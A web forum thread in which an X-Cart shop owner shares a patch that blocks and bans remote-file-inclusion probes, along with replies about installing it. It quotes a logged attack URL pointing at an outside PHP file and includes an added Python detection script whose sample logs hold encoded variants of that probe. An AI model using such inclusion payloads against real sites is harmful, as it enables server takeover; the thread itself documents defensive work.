[PATCH] Blocking those pesky hackers

 
   X-Cart forums > X-Cart 4 > Dev Questions
 
#1  04-01-2008, 11:24 AM
intel352 (X-Wizard; Join Date: Dec 2005; Posts: 1,071)

[PATCH] Blocking those pesky hackers

My wife's X-Cart website has been showing a large number of Users Online for the past few weeks, but the purchases aren't nearly equaling the number of visitors.

I decided to check out the type of traffic that she's getting, and found that many are hackers/bots that are trying to exploit different areas of the website. One such exploit that I've seen 20 of in the past hour is: /help.php?section=http://myweddingphotos.by.ru/image.php?

The url that the hackers are passing varies. Many are trying to see if they can execute a remote inclusion apparently, and since this is the most popular attempt on our store right now, I've written some code to block such attempts, and ban the user (bans use the Stop List module, if it's enabled).

As mentioned above, the Stop List module is used if detected to record bans, but if it's not enabled, that's fine; the patch will only block *immediate* hack attempts. When Stop List is enabled, that is when an IP ban will occur.

The attached zip file has a .patch file and a .sql file. You can apply both patches via the Patch/Upgrade section of the X-Cart Administration.

Additionally, this is for 4.1, I have not tested on any older versions of X-Cart.

NOTE: If you happen to block yourself from your own store, the blocked IPs are only blocked from the customer section, so you can still log in to your admin section, go to the Stop List section, and delete your IP address.

Once I enabled this mod, I noticed that our Users Online started being a bit more accurate, as this mod blocks the hack attempts before they get logged as a visitor.

This code only bans based on a "http://" value being passed in the query string. I'm not aware of X-Cart passing a full url to itself in any query string parameters, but you need to be responsible for your own store by testing this thoroughly.
No need to ban your users because you didn't test the patch out.

I would specifically recommend testing multi-language websites, as that redirect method might pass a complete url, but I don't believe it does.
Attached Files
File Type: zip patch_security.zip (1.1 KB, 439 views)
__________________
-Jon Langevin
WARNING: Unethical developer - NOT RECOMMENDED
See details here

The following 2 users thank intel352 for this useful post:
cherkes (05-03-2010), Dan.roh (02-25-2010)
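The rule the patch applies (a query-string value carrying a full "http://" URL, tallied per client IP for the Stop List), as an added example that is not the attached patch's code: it runs the check over constructed Apache access-log lines so the behaviour can be tested offline before anything is banned. The log lines and the allow-listed `return` parameter are assumptions; the allow-list illustrates the warning in the post about legitimate full URLs in query strings.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format log lines; the first probe mirrors the
# URL quoted in the post, the third is the same kind of probe double-encoded.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Apr/2008:11:02:13 -0800] "GET /help.php?section=http://myweddingphotos.by.ru/image.php? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.3 - - [01/Apr/2008:11:02:20 -0800] "GET /home.php?cat=12 HTTP/1.1" 200 9013 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Apr/2008:11:03:01 -0800] "GET /help.php?section=%2568ttp%253A%252F%252Fexample.net%252Fa.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.9 - - [01/Apr/2008:11:04:44 -0800] "GET /cart.php?mode=checkout&return=http://shop.example/thanks HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

# Hypothetical allow-list of parameters the shop legitimately fills with a
# full URL; the post warns that an untested rule would ban real customers.
ALLOWED_URL_PARAMS = frozenset({"return"})

def is_remote_url(value: str) -> bool:
    """True if the value, after one extra decoding pass, is an absolute URL."""
    decoded = unquote(value).strip().lower()  # parse_qsl already decoded once
    return decoded.startswith(("http://", "https://", "ftp://"))

def rfi_params(target: str) -> list:
    """Return (name, value) pairs in the request target that carry a remote URL."""
    query = urlsplit(target).query
    return [
        (name, value)
        for name, value in parse_qsl(query, keep_blank_values=True)
        if name not in ALLOWED_URL_PARAMS and is_remote_url(value)
    ]

def scan_log(text: str) -> Counter:
    """Count remote-inclusion probes per client IP across a log."""
    hits = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and rfi_params(m["target"]):
            hits[m["ip"]] += 1
    return hits

def ban_candidates(hits: Counter, threshold: int = 1) -> list:
    """IPs at or above the threshold, ready for an IP ban list such as Stop List."""
    return sorted(ip for ip, n in hits.items() if n >= threshold)
```

Running `ban_candidates(scan_log(SAMPLE_LOG))` flags only 203.0.113.7; the checkout request with a full URL in the allow-listed `return` parameter is left alone.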
#2  04-01-2008, 02:20 PM
Jerrad (X-Adept; Join Date: Nov 2004; Location: The Netherlands; Posts: 484)

Re: [PATCH] Blocking those pesky hackers

Thanks for this mod, Jon!
I really would like to implement it in our 4.0.12 store, because lately we're also seeing a lot of the same URLs.

Can any harm be done by this patch in an older version of X-Cart?
__________________
X-Cart 4.0.12
Heavy modified with paid, free and forum mods.
PHP 5.2.5 | MYSQL 5.0.51a
#3  04-01-2008, 02:39 PM
intel352 (X-Wizard; Join Date: Dec 2005; Posts: 1,071)

Re: [PATCH] Blocking those pesky hackers

You'll likely have to manually apply. I haven't checked it or tested it on 4.0 at all. If anything, the code that doesn't pertain to the Stop_List module should work completely fine. I dunno if Stop_List is available in 4.0; if it is, you'll need to make sure the same functions exist (for the IP ban functionality).
#4  04-01-2008, 07:37 PM
intel352 (X-Wizard; Join Date: Dec 2005; Posts: 1,071)

Re: [PATCH] Blocking those pesky hackers

We've had 31 bans, just today (I didn't enable the hack until afternoon... lol)
#5  04-02-2008, 04:55 AM
Jerrad (X-Adept; Join Date: Nov 2004; Location: The Netherlands; Posts: 484)

Re: [PATCH] Blocking those pesky hackers

Version 4.0.x has a stop_list, but applying patches manually is not one of my strongest skills...
#6  04-02-2008, 05:30 PM
mltriebe (Senior Member; Join Date: Mar 2006; Posts: 137)

Re: [PATCH] Blocking those pesky hackers

Quote:
Originally Posted by intel352
We've had 31 bans, just today (I didn't enable the hack until afternoon... lol)

I just installed this and was wondering where you found this information. I will let you know how it works when I get some results because I have had a "BUNCH" of these hackers lately.

Mike
__________________
X-Cart 4.3.1
Buy Together Module, AlteredCart
CDSEO Pro
One Page Checkout, AlteredCart
Smart Search, AlteredCart
On Sale, AlteredCart
#7  04-02-2008, 06:58 PM
intel352 (X-Wizard; Join Date: Dec 2005; Posts: 1,071)

Re: [PATCH] Blocking those pesky hackers

If you have Stop List enabled, you'll see the bans in there, with the reason "Malicious hacker activity".
#8  04-02-2008, 08:29 PM
Funinc (Senior Member; Join Date: Sep 2002; Location: CA; Posts: 108)

Re: [PATCH] Blocking those pesky hackers

Jon,
Can you please contact me.

Thank You,
Timm
#9  04-05-2008, 07:57 AM
mltriebe (Senior Member; Join Date: Mar 2006; Posts: 137)

Re: [PATCH] Blocking those pesky hackers

Seems to be working well. I have not seen an http:// address in the Users Online section since installing the patch. That being said, I have enabled the Stop List and there are no IPs there either; must be a setting or something.

Thanks, Mike
#10  04-08-2008, 08:08 AM
intel352 (X-Wizard; Join Date: Dec 2005; Posts: 1,071)

Re: [PATCH] Blocking those pesky hackers

Hey Mike, as long as the Stop List module is enabled, it should add bans there. You might want to ensure there are no errors being tossed by your error log.
X-Cart forums © 2001-2020